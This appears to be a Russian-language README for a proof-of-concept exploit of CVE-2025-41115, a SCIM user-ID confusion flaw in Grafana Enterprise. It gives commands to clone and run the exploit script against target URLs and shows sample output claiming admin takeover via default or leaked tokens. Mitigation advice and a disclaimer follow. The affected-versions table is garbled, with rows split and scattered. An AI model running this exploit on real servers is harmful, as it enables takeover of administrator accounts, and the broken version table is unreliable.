
CVE-2025-41115

Критическая уязвимость повышения привилегий SCIM в Grafana Enterprise
CVE-2025-41115 — это критическая (CVSS 10.0) уязвимость в Grafana Enterprise, затрагивающая функцию SCIM-провижининга пользователей.
Когда SCIM-провижининг включен и user_sync_enabled = true, вредоносный SCIM-клиент может отправить числовой externalId, который Grafana ошибочно сопоставляет с внутренним ID пользователя — что позволяет атакующему выдавать себя за существующие учетные записи или перезаписывать их, включая администраторов.
⚠️ Grafana OSS НЕ затронут.
Условия, необходимые для эксплуатации:
enableSCIM = true[auth.scim] user_sync_enabled = true| Версия | Статус |
|---|---|
| 12.0.0 → 12.2.1 | ❌ Уязвима |
| 12.3.0 | ✅ Исправлена |
| 12.2.1 (исправленная сборка) | ✅ Исправлена |
| 12.1.3 |
💡 Управляемые сервисы Grafana (AWS/Azure/Grafana Cloud) были исправлены вендорами.
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
или просто скопируйте и вставьте скрипт выше в файл
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
Когда эксплойт действительно срабатывает (т.е. цель уязвима и токен действителен), вы увидите вывод, точно похожий на этот: text
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
Обновитесь до 12.3.0 или одной из исправленных промежуточных версий.
Если вы не используете SCIM-провижининг, убедитесь, что у вас:
enableSCIM = false
или
[auth.scim]
user_sync_enabled = false
Ищите:
externalIdУбедитесь, что только доверенным поставщикам удостоверений разрешено взаимодействовать с вашей SCIM-конечной точкой.
Следите за подозрительными входами, событиями создания пользователей или захватом учетных записей администраторов.
Этот PoC предназначен только для авторизованного тестирования безопасности и образовательных целей в системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное использование незаконно и может привести к уголовному преследованию. Автор и распространитель не несут ответственности за неправильное использование. Немедленно установите исправление (≥12.0.6 / 12.3.0+).
| ✅ Исправлена |
| 12.0.6 | ✅ Исправлена |